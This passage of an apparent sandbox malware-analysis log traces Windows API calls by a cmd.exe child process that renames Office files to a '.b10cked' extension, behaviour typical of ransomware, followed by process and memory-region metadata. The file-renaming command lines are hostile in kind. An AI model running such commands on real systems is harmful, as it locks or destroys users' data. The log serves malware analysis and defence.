lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x40, 
lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegCloseKey (hKey=0x40) returned 0x0 [0153.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e834 | out: phkResult=0x18e834*=0x40) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x0, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegCloseKey (hKey=0x40) 
returned 0x0 [0153.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.712] srand (_Seed=0x5b88637c) [0153.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" [0153.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" [0153.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.713] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.713] GetEnvironmentStringsW () returned 0x282360* [0153.713] FreeEnvironmentStringsW (penv=0x282360) returned 1 [0153.713] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.713] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.713] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.713] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.713] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.713] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.713] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f600 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f600, lpFilePart=0x18f5fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5fc*="Desktop") returned 0x18 [0153.714] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: 
hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.715] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.715] GetEnvironmentStringsW () returned 0x280210* [0153.715] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0153.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.715] GetConsoleOutputCP () returned 0x1b5 [0153.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.716] GetUserDefaultLCID () returned 0x409 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f740, cchData=128 | out: lpLCData="0") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f740, cchData=128 | out: lpLCData="0") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f740, cchData=128 | out: lpLCData="1") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.717] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.718] GetConsoleTitleW (in: lpConsoleTitle=0x270930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.718] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.719] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.719] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.719] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.719] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.719] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.719] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.719] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.723] GetConsoleTitleW (in: lpConsoleTitle=0x18f438, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.723] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.723] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.723] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.723] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.723] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.723] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.723] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.724] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.724] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.724] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.724] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.724] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.724] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.724] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.724] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.724] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0153.724] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.724] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.724] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.724] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.726] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.726] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.726] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.728] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.728] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0153.728] _wcsicmp 
(_String1="MSOINT~1.TRX", _String2="..") returned 63 [0153.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~1.trx")) returned 0x2020 [0153.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.728] SetErrorMode (uMode=0x0) returned 0x0 [0153.728] SetErrorMode (uMode=0x1) returned 0x0 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x18eb7c, lpFilePart=0x18eb64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", lpFilePart=0x18eb64*="MSOINT~1.TRX") returned 0x3c [0153.728] SetErrorMode (uMode=0x0) returned 0x1 [0153.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.729] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0153.729] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0153.729] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~1.trx")) returned 0x2020 [0153.729] SetErrorMode (uMode=0x0) returned 0x0 [0153.729] SetErrorMode (uMode=0x1) returned 0x0 [0153.729] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x18eff8, lpFilePart=0x18ed90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", lpFilePart=0x18ed90*="MSOINT~1.TRX") returned 0x3c [0153.729] SetErrorMode (uMode=0x0) returned 0x1 [0153.729] SetErrorMode (uMode=0x0) returned 0x0 [0153.729] SetErrorMode (uMode=0x1) returned 0x0 [0153.729] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f200, lpFilePart=0x18ed90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x18ed90*="MSOINTL.DLL.trx_dll.b10cked") returned 0x4b [0153.729] SetErrorMode (uMode=0x0) returned 0x1 [0153.729] SetLastError (dwErrCode=0x0) [0153.729] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll.b10cked")) returned 0xffffffff [0153.729] GetLastError () returned 0x2 [0153.729] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e70c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e70c) returned 0x282130 [0153.729] FindNextFileW (in: hFindFile=0x282130, lpFindFileData=0x18e70c | out: lpFindFileData=0x18e70c) returned 0 [0153.730] GetLastError () returned 0x12 [0153.730] FindClose (in: hFindFile=0x282130 | out: hFindFile=0x282130) returned 1 [0153.731] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cc0) returned 0x282130 [0153.732] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0153.732] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0153.732] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll")) returned 0x2020 [0153.732] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.732] FindClose (in: hFindFile=0x282130 | out: hFindFile=0x282130) returned 1 [0153.732] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e958 | out: _Buffer=" 1") returned 9 [0153.732] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.732] GetFileType (hFile=0x7) returned 0x2 [0153.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.733] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8e4 | out: lpMode=0x18e8e4) returned 1 [0153.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e918 | out: lpConsoleScreenBufferInfo=0x18e918) returned 1 [0153.733] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.734] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e958 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.734] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x18e93c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e93c*=0x1a) returned 1 [0153.734] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.734] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.734] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.734] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.734] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.734] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.734] SetConsoleInputExeNameW () returned 0x1 [0153.735] GetConsoleOutputCP () returned 0x1b5 [0153.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.735] exit (_Code=0) Process: id = "256" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21016 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21017 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21018 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21019 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 21020 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21021 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21022 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21023 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 